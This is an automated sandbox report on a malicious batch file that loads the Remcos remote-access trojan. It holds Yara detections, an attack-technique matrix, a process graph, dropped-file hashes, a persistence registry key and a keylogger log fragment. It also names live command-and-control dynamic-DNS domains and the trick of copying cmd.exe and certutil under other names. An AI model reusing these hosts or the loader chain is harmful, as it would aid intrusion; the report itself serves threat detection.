                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\ANYDESKS\logs.dat, type: DROPPED
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe19_2_0040569A
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,6_2_00007FF6A29E227C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FE568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,6_2_00007FF6A29FE568
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E54A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,6_2_00007FF6A29E54A0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A05648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,6_2_00007FF6A2A05648
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  2
                  Valid Accounts
                  1
                  Native API
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  2
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services12
                  Archive Collected Data
                  12
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  Data Encrypted for Impact
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  1
                  Bypass User Account Control
                  1
                  Deobfuscate/Decode Files or Information
                  111
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol111
                  Input Capture
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  System Shutdown/Reboot
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  2
                  Valid Accounts
                  2
                  Valid Accounts
                  2
                  Obfuscated Files or Information
                  2
                  Credentials In Files
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  1
                  Remote Access Software
                  Automated Exfiltration1
                  Defacement
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Windows Service
                  21
                  Access Token Manipulation
                  1
                  Install Root Certificate
                  NTDS1
                  System Network Connections Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Registry Run Keys / Startup Folder
                  1
                  Windows Service
                  1
                  Timestomp
                  LSA Secrets2
                  File and Directory Discovery
                  SSHKeylogging213
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts422
                  Process Injection
                  1
                  DLL Side-Loading
                  Cached Domain Credentials46
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Registry Run Keys / Startup Folder
                  1
                  Bypass User Account Control
                  DCSync341
                  Security Software Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  File Deletion
                  Proc Filesystem12
                  Virtualization/Sandbox Evasion
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt221
                  Masquerading
                  /etc/passwd and /etc/shadow3
                  Process Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
                  Valid Accounts
                  Network Sniffing1
                  Application Window Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                  Virtualization/Sandbox Evasion
                  Input Capture1
                  System Owner/User Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task21
                  Access Token Manipulation
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers422
                  Process Injection
                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565803 Sample: saw.bat Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 83 myumysmeetr.ddns.net 2->83 85 mysweeterbk.ddns.net 2->85 87 6 other IPs or domains 2->87 103 Suricata IDS alerts for network traffic 2->103 105 Found malware configuration 2->105 107 Malicious sample detected (through community Yara rule) 2->107 111 14 other signatures 2->111 10 cmd.exe 1 2->10         started        12 Puyiaiob.PIF 2->12         started        15 Puyiaiob.PIF 2->15         started        signatures3 109 Uses dynamic DNS services 85->109 process4 signatures5 17 AnyDesk.PIF 1 6 10->17         started        22 extrac32.exe 1 10->22         started        24 alpha.exe 1 10->24         started        30 5 other processes 10->30 129 Multi AV Scanner detection for dropped file 12->129 131 Writes to foreign memory regions 12->131 133 Allocates memory in foreign processes 12->133 137 2 other signatures 12->137 26 SndVol.exe 12->26         started        135 Allocates many large memory junks 15->135 28 colorcpl.exe 15->28         started        process6 dnsIp7 79 drive.usercontent.google.com 142.250.181.33, 443, 49732 GOOGLEUS United States 17->79 81 drive.google.com 172.217.19.238, 443, 49730, 49731 GOOGLEUS United States 17->81 69 C:\Users\Public\Puyiaiob.url, MS 17->69 dropped 71 C:\Users\Public\Libraries\Puyiaiob, data 17->71 dropped 113 Multi AV Scanner detection for dropped file 17->113 115 Writes to foreign memory regions 17->115 117 Allocates memory in foreign processes 17->117 127 4 other signatures 17->127 32 colorcpl.exe 5 3 17->32         started        36 cmd.exe 1 17->36         started        38 esentutl.exe 2 17->38         started        73 C:\Users\Public\alpha.exe, PE32+ 22->73 dropped 119 Drops PE files to the user root directory 22->119 121 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 22->121 123 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 22->123 40 kn.exe 3 2 24->40         started        125 Detected Remcos RAT 26->125 42 kn.exe 2 30->42         started        44 extrac32.exe 1 30->44         started        file8 signatures9 process10 file11 61 C:\ProgramData\ANYDESKS\logs.dat, data 32->61 dropped 91 Contains functionality to bypass UAC (CMSTPLUA) 32->91 93 Detected Remcos RAT 32->93 95 Contains functionalty to change the wallpaper 32->95 101 5 other signatures 32->101 46 esentutl.exe 2 36->46         started        50 alpha.pif 36->50         started        52 esentutl.exe 2 36->52         started        56 6 other processes 36->56 63 C:\Users\Public\Libraries\Puyiaiob.PIF, PE32 38->63 dropped 54 conhost.exe 38->54         started        97 Registers a new ROOT certificate 40->97 99 Drops PE files with a suspicious file extension 40->99 65 C:\Users\Public\Libraries\AnyDesk.PIF, PE32 42->65 dropped 67 C:\Users\Public\kn.exe, PE32+ 44->67 dropped signatures12 process13 file14 75 C:\Users\Public\alpha.pif, PE32 46->75 dropped 139 Drops PE files to the user root directory 46->139 141 Drops PE files with a suspicious file extension 46->141 143 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 46->143 58 xpha.pif 50->58         started        77 C:\Users\Public\xpha.pif, PE32 52->77 dropped signatures15 process16 dnsIp17 89 127.0.0.1 unknown unknown 58->89

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  saw.bat8%ReversingLabsScript-BAT.Trojan.Heuristic
                  SourceDetectionScannerLabelLink
                  C:\Users\Public\Libraries\AnyDesk.PIF24%ReversingLabsWin32.Trojan.Generic
                  C:\Users\Public\Libraries\Puyiaiob.PIF24%ReversingLabsWin32.Trojan.Generic
                  C:\Users\Public\alpha.exe0%ReversingLabs
                  C:\Users\Public\alpha.pif0%ReversingLabs
                  C:\Users\Public\kn.exe0%ReversingLabs
                  C:\Users\Public\xpha.pif0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  mysweeterbk.ddns.net100%Avira URL Cloudmalware
                  meetre1ms.freeddns.org0%Avira URL Cloudsafe
                  https://drive.usercontn0%Avira URL Cloudsafe
                  bbhmeetre1ms.freeddns.org0%Avira URL Cloudsafe
                  freshmysweeterbk.ddns.net0%Avira URL Cloudsafe
                  myumysmeetr.ddns.net0%Avira URL Cloudsafe
                  tre1ms.freeddns.org0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  drive.google.com
                  172.217.19.238
                  truefalse
                    high
                    drive.usercontent.google.com
                    142.250.181.33
                    truefalse
                      high
                      myumysmeetr.ddns.net
                      0.0.0.0
                      truetrue
                        unknown
                        mysweeterbk.ddns.net
                        unknown
                        unknowntrue
                          unknown
                          bbhmeetre1ms.freeddns.org
                          unknown
                          unknowntrue
                            unknown
                            freshmeetre1ms.freeddns.org
                            unknown
                            unknowntrue
                              unknown
                              freshmysweeterbk.ddns.net
                              unknown
                              unknowntrue
                                unknown
                                meetre1ms.freeddns.org
                                unknown
                                unknowntrue
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  mysweeterbk.ddns.nettrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  tre1ms.freeddns.orgtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  myumysmeetr.ddns.nettrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  meetre1ms.freeddns.orgtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  bbhmeetre1ms.freeddns.orgtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  freshmysweeterbk.ddns.nettrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpfalse
                                    high
                                    https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drfalse
                                      high
                                      https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
                                        high
                                        https://sectigo.com/CPS0AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
                                          https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
                                            high
                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              http://ocsp.sectigo.com0AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  https://drive.usercontent.google.com/AnyDesk.PIF, 00000009.00000003.1823239665.0000000000675000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.0000000000696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
                                                        high
                                                        https://drive.usercontnAnyDesk.PIF, 00000009.00000003.1823239665.000000000066B000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://geoplugin.net/json.gpcolorcpl.exefalse
                                                          high
                                                          https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drfalse
                                                            high
                                                            http://geoplugin.net/json.gp/Ccolorcpl.exe, 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/AnyDesk.PIF, 00000009.00000002.1845207168.00000000005EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
                                                                  high
                                                                  http://www.pmail.comAnyDesk.PIF, AnyDesk.PIF, 00000009.00000002.1903384135.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698042458.000000000290C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1848830449.000000000290F000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Puyiaiob.PIF, 0000001C.00000002.1967008119.0000000002AD2000.00000004.00001000.00020000.00000000.sdmp, Puyiaiob.PIF, 0000001F.00000002.2050844522.0000000002B42000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
                                                                      high
                                                                      https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                                                                        high
                                                                        http://ocsp.sectigo.com0CAnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          172.217.19.238
                                                                          drive.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          142.250.181.33
                                                                          drive.usercontent.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          IP
                                                                          127.0.0.1
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1565803
                                                                          Start date and time:2024-11-30 21:19:04 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 12m 3s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:34
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:saw.bat
                                                                          Detection:MAL
                                                                          Classification:mal100.rans.bank.troj.spyw.expl.evad.winBAT@55/22@240/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 60
                                                                          • Number of non-executed functions: 206
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .bat
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: saw.bat
                                                                          TimeTypeDescription
                                                                          15:19:57API Interceptor2x Sleep call for process: AnyDesk.PIF modified
                                                                          15:20:23API Interceptor2x Sleep call for process: Puyiaiob.PIF modified
                                                                          15:20:46API Interceptor2633720x Sleep call for process: colorcpl.exe modified
                                                                          20:19:46Task SchedulerRun new task: {FAE0C93B-B610-4BA1-AE2E-352962E6DB7A} path:
                                                                          20:20:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Puyiaiob C:\Users\Public\Puyiaiob.url
                                                                          20:20:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Puyiaiob C:\Users\Public\Puyiaiob.url
                                                                          No context
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          myumysmeetr.ddns.netyak.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                          • 89.117.145.5
                                                                          No context
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                          • 172.217.19.238
                                                                          • 142.250.181.33
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.217.19.238
                                                                          • 142.250.181.33
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.217.19.238
                                                                          • 142.250.181.33
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.217.19.238
                                                                          • 142.250.181.33
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.217.19.238
                                                                          • 142.250.181.33
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.217.19.238
                                                                          • 142.250.181.33
                                                                          x.exeGet hashmaliciousDBatLoaderBrowse
                                                                          • 172.217.19.238
                                                                          • 142.250.181.33
                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                          • 172.217.19.238
                                                                          • 142.250.181.33
                                                                          mmF9ZzglIn.vbsGet hashmaliciousUnknownBrowse
                                                                          • 172.217.19.238
                                                                          • 142.250.181.33
                                                                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                          • 172.217.19.238
                                                                          • 142.250.181.33
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\Public\alpha.exeA1 igazol#U00e1s.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                            Documentazione_Doganale_richieste_di_copia.cmdGet hashmaliciousDBatLoaderBrowse
                                                                              78326473_PDF.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                iuhmzvlH.cmdGet hashmaliciousUnknownBrowse
                                                                                  USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                    Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                      Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                        #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmdGet hashmaliciousUnknownBrowse
                                                                                          #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                            TZH3Uk8x45.batGet hashmaliciousDBatLoader, PureLog Stealer, XWormBrowse
                                                                                              Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):356
                                                                                              Entropy (8bit):3.2841478843310083
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:6lfglQtC5YcIeeDAlIfE/OS/1gWA41gWAGfE/OSFWAv:6l4lQtCecB/OSqWIWa/OSFW+
                                                                                              MD5:ADBDC66395B0A3344B8F95620A4D8E12
                                                                                              SHA1:794664AF61F00AD2855D661964F8DCD9F281C67C
                                                                                              SHA-256:C0E1C82FC0A8A9B147CFA56BF74482834B03883759CC0C378719D02A8FE0CB3E
                                                                                              SHA-512:C6DC4FCE1804662615493A6FC3BFF2233982329013E8D087923E23578F096DD42DB1416F9102D1C8138C2D19BFB8BCB7D323ABA7685EBCCFC394AA6F658C78EE
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\ANYDESKS\logs.dat, Author: Joe Security
                                                                                              Preview:....[.2.0.2.4./.1.1./.3.0. .1.5.:.2.0.:.1.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                              Process:C:\Users\Public\kn.exe
                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):2117634
                                                                                              Entropy (8bit):3.866920803629215
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:ZzNbICEKK8QduVo61G7ZT/HAnA1PMOf4hB63BF4Uc5U5:O
                                                                                              MD5:327EE6DCF81E0C79B5F0D98FA9827D97
                                                                                              SHA1:6855C1D0A5A78B282791317325B63D1AB386180D
                                                                                              SHA-256:976D7BABCDE75ECB4D9B07F3FB406AB28B61C82B4B5ED3D0B73418AC76F56464
                                                                                              SHA-512:3896603182283921A240C50ED60D9FAE0AECADE0536D6D0562759AB5653536576401569A270AE8F8A91F22C01F0E972D3EBBA3B09EA44B8B41175A9217F18B77
                                                                                              Malicious:false
                                                                                              Preview:4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b01021900ce050000560a00000000005ce705000010000000f005000000400000100000000200000400000000000000040000000000000000c01000000400000000000002000000000010000040000000001000001000000000000010000000000000000000000000500600de2600000010070000a609000000000000000000000000000000000000a0060084670000000000000000000000000000000000000000000000000000009006001800000000000000000000000000000000000000245706000c0600000000000000000000000000000000000000000000
                                                                                              Process:C:\Users\Public\kn.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1058816
                                                                                              Entropy (8bit):6.943911720958145
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:uYpg9YBvkXS4+lSFSZtY09Rzviu3E3Xxb5upgNcyAq9cfeWybiZFIO37Lftiid:TCYkXV+ldZtDRDiuqx1SeWybiZFIOn
